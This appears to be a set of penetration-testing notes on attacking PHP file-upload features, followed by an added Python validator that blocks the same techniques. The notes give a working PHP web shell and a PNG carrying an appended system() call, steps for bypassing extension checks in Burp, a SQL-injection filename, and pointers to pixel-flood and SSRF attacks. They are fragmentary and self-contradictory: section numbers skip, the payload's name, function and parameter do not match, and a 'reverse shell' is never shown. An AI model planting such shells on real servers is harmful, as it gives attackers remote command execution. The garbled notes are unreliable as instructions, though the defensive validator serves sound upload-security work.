Observe which PHP functions (popen(), system(), shell_exec(), passthru()) are disabled and which are enabled in this PHP application.
Craft a reverse shell payload with an enabled PHP function and save it as shell.php; if there is client-side validation, name it shell.php.jpg to bypass it.
Intercept the file upload request in Burp Suite, remove the .jpg extension, and forward the request to the server.
Payload with that popen() PHP function:
---------
<?php
$cmd = $_GET['cmd'];
echo `$cmd`;
?>
/uploadform/uploads/shell.php?code=echo%20%60id%60
2. File Upload and Path Traversal to RCE
Using any attachment upload function, upload a PNG file that contains PHP code at its end. You can use the file png-transparent.png from the attachments; it is an empty PNG file with the following payload at its end:
<?php system("uname -a");?>
Resend the request, modifying the filename to the path, relative to the server's filesystem, of the uploaded file:
We can test for SQLi by using the filename sleep(10)-- -.jpg and uploading the file. Once the file is uploaded, if the application's response is delayed by the specified time, the application is vulnerable to SQLi.
Observe the server's response after uploading the generated file.
Confirm whether the application is still accessible from another device. If the server takes too long to respond or is inaccessible, the application may be vulnerable to a pixel flood attack.
6. File Upload to SSRF:
Server-Side Request Forgery can be reached through a file upload function that accepts HTML or SVG files, through an upload-by-URL feature, or through various components that fetch remote resources. Depending on the situation, the SSRF may reach internal, cloud-based, or simply external targets.
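The following server-side upload validator is an added example, not code from these notes or from any application they describe. It shows, in one place, the controls that defeat each technique listed above: the file type is decided from the bytes rather than the client's name or Content-Type (double extensions such as shell.php.jpg become irrelevant, and SVG/HTML uploads are refused, which removes the SSRF vector), a PNG with data after its IEND chunk or a JPEG with data after its EOI marker is rejected (the "PHP appended to a PNG" pattern), a width-by-height cap rejects pixel-flood images before any decoder runs, the stored name is random with a server-chosen extension so traversal sequences in the filename never reach the filesystem, and the filename is written to the database with bound parameters so a name like sleep(10)-- -.jpg is inert. The policy values, the upload directory path, the Verdict type and the sqlite table are all assumptions made for this example; make_png and make_jpeg build constructed, structurally valid sample files so the code runs offline.

```python
import re
import secrets
import sqlite3
import struct
import zlib
from dataclasses import dataclass

# Policy values are assumptions for this example; tune them per application.
MAX_BYTES = 2 * 1024 * 1024   # hard size cap, checked before any parsing
MAX_PIXELS = 25_000_000       # width * height cap: stops tiny-file, huge-canvas pixel floods
PHP_OPEN_TAG = re.compile(rb"<\?(php\b|=)")  # "<?" alone would also flag harmless "<?xml"

@dataclass
class Verdict:
    ok: bool
    reason: str
    ext: str = ""
    width: int = 0
    height: int = 0

def _png_dims_and_end(data: bytes):
    """Walk PNG chunks; return (width, height, offset just past IEND's CRC)."""
    pos, width, height = 8, None, None
    while pos + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        if ctype == b"IHDR":
            width, height = struct.unpack(">II", data[pos + 8:pos + 16])
        pos += 12 + length
        if ctype == b"IEND":
            if width is None:
                raise ValueError("IEND before IHDR")
            return width, height, pos
    raise ValueError("no IEND chunk")

def _jpeg_dims(data: bytes):
    """Walk JPEG segments up to the first SOFn frame header; return (width, height)."""
    pos = 2
    while pos + 4 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError("marker expected")
        marker = data[pos + 1]
        if marker in (0xFF, 0xD8) or 0xD0 <= marker <= 0xD7:   # fill byte, SOI, RSTn: no length field
            pos += 1 if marker == 0xFF else 2
            continue
        seglen = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        if 0xC0 <= marker <= 0xCF and marker not in (0xC4, 0xC8, 0xCC):   # SOFn
            height, width = struct.unpack(">HH", data[pos + 5:pos + 9])
            return width, height
        pos += 2 + seglen
    raise ValueError("no SOF segment")

def validate_upload(data: bytes) -> Verdict:
    """Decide by content only; the client's filename and Content-Type are never consulted."""
    if len(data) > MAX_BYTES:
        return Verdict(False, "file too large")
    try:
        if data[:8] == b"\x89PNG\r\n\x1a\n":
            ext = "png"
            width, height, end = _png_dims_and_end(data)
            if end != len(data):                  # the "PHP appended after the image" pattern
                return Verdict(False, "trailing data after IEND")
        elif data[:3] == b"\xff\xd8\xff":
            ext = "jpg"
            width, height = _jpeg_dims(data)
            if not data.endswith(b"\xff\xd9"):
                return Verdict(False, "trailing data after EOI")
        else:                                     # SVG, HTML, PHP, polyglots of other types
            return Verdict(False, "unsupported type")
    except (ValueError, struct.error) as exc:
        return Verdict(False, f"malformed image: {exc}")
    if width * height > MAX_PIXELS:
        return Verdict(False, "image dimensions exceed policy")
    if PHP_OPEN_TAG.search(data):                 # tags hidden in tEXt chunks, COM segments, EXIF
        return Verdict(False, "embedded PHP tag")
    return Verdict(True, "ok", ext, width, height)

def storage_name(verdict: Verdict) -> str:
    """Random name, server-chosen extension; save under an assumed /var/app-data/uploads outside the web root."""
    return f"{secrets.token_hex(16)}.{verdict.ext}"

def record_upload(original_name: str, stored_name: str, db_path: str = ":memory:") -> str:
    """Persist metadata with bound parameters (assumed schema); returns the original name as read back."""
    conn = sqlite3.connect(db_path)
    conn.execute("CREATE TABLE IF NOT EXISTS uploads (id INTEGER PRIMARY KEY, original TEXT, stored TEXT)")
    cur = conn.execute("INSERT INTO uploads (original, stored) VALUES (?, ?)", (original_name[:255], stored_name))
    row = conn.execute("SELECT original FROM uploads WHERE id = ?", (cur.lastrowid,)).fetchone()
    conn.commit()
    conn.close()
    return row[0]

# Constructed sample inputs, not real files: structurally valid images with dummy pixel data.
def make_png(width: int, height: int, trailing: bytes = b"") -> bytes:
    def chunk(ctype, body):
        return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", zlib.crc32(ctype + body))
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 6, 0, 0, 0)
    return (b"\x89PNG\r\n\x1a\n" + chunk(b"IHDR", ihdr)
            + chunk(b"IDAT", zlib.compress(b"\x00" * 4)) + chunk(b"IEND", b"") + trailing)

def make_jpeg(width: int, height: int, comment: bytes = b"") -> bytes:
    com = b"\xff\xfe" + struct.pack(">H", 2 + len(comment)) + comment if comment else b""
    sof0 = b"\xff\xc0" + struct.pack(">HBHHB", 11, 8, height, width, 1) + b"\x01\x11\x00"
    return b"\xff\xd8" + com + sof0 + b"\xff\xd9"
```

Call validate_upload on the raw request body, then storage_name and record_upload only on an ok verdict. The structural checks here are a first gate; the stronger production measures are to re-encode every accepted image with an image library so that no attacker-controlled bytes survive, to serve uploads from a directory (or separate origin) where the web server maps no script handler, and to keep shell-capable PHP functions disabled as the first step of the notes already looks for.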